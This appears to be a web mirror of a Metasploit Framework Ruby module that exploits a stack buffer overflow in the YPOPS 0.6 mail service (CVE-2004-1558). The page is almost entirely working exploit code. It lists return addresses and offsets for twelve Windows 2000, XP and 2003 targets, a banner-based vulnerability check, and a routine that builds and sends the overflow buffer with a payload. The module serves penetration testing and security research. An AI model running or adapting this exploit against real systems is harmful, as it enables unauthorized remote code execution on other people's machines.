Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/smtp/ypops_overflow1.rb
19572 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::Smtp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'YPOPS 0.6 Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a stack buffer overflow in the YPOPS POP3

18
          service.

19


20
          This is a classic stack buffer overflow for YPOPS version 0.6.

21
          Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to

22
          jmp ebx opcode in ws_32.dll

23
        },

24
        'Author' => [ 'acaro <acaro[at]jervus.it>' ],

25
        'References' => [

26
          [ 'CVE', '2004-1558'],

27
          [ 'OSVDB', '10367'],

28
          [ 'BID', '11256'],

29
          [ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],

30
        ],

31
        'Platform' => 'win',

32
        'Privileged' => false,

33
        'Payload' => {

34
          'Space' => 1200,

35
          'BadChars' => "\x00\x25",

36
          'MinNops' => 106,

37
        },

38
        'Targets' => [

39
          [ 'Windows 2000 SP0 Italian', { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],

40
          [ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],

41
          [ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],

42
          [ 'Windows 2000 SP0 English', { 'Ret' => 0x75036113, 'Offset' => 503 }, ],

43
          [ 'Windows 2000 SP1 English', { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],

44
          [ 'Windows 2000 SP2 English', { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],

45
          [ 'Windows 2000 SP3 English', { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],

46
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],

47
          [ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],

48
          [ 'Windows XP SP2 English', { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],

49
          [ 'Windows 2003 SP0 English', { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],

50
          [ 'Windows 2003 SP1 English', { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],

51
        ],

52
        'DisclosureDate' => '2004-09-27',

53
        'Notes' => {

54
          'Reliability' => UNKNOWN_RELIABILITY,

55
          'Stability' => UNKNOWN_STABILITY,

56
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

57
        }

58
      )

59
    )

60
  end

61


62
  def check

63
    connect

64
    disconnect

65


66
    banner.gsub!(/\n/, '')

67


68
    if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/

69
      vprint_status("Vulnerable SMTP server: #{banner}")

70
      return Exploit::CheckCode::Detected

71
    end

72


73
    vprint_status("Unknown SMTP server: #{banner}")

74
    return Exploit::CheckCode::Safe

75
  end

76


77
  def exploit

78
    connect

79


80
    pattern =

81
      rand_text_alpha(target['Offset'] - payload.encoded.length) +

82
      payload.encoded +

83
      [target.ret].pack('V') +

84
      "\n"

85


86
    print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")

87


88
    sock.put(pattern)

89


90
    handler

91
    disconnect

92
  end

93
end

94


95